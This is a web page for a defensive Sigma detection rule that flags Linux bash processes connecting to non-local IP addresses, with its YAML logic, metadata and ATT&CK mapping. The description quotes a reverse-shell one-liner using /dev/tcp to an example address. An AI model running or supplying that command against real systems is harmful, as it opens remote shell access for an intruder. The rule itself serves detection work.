Detectioncriticaltest

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch

Florian Roth (Nextron Systems)Created Sat Oct 16Updated Sun Dec 2583dcd9f6-9ca8-4af7-a16e-a1c7a6b51871linux

Log Source

LinuxNetwork Connection

ProductLinux← raw: linux

CategoryNetwork Connection← raw: network_connection

Events for outbound and inbound network connections including DNS resolution.

Detection Logic

detection:
    selection:
        Image|endswith: '/bin/bash'
    filter:
        DestinationIp:
            - '127.0.0.1'
            - '0.0.0.0'
    condition: selection and not filter

False Positives

Unknown

False positive likelihood has not been assessed. Additional context may be needed during triage.

References

Resolving title…

github.com

MITRE ATT&CK

Tactics

TA0002 · Execution

Sub-techniques

T1059.004 · Unix Shell

Rule Metadata

Rule ID

83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871

Status

test

Level

critical

Type

Detection

Created

Sat Oct 16

Modified

Sun Dec 25

Author

Florian Roth (Nextron Systems)

Path

rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml

Raw Tags

attack.executionattack.t1059.004

View on GitHub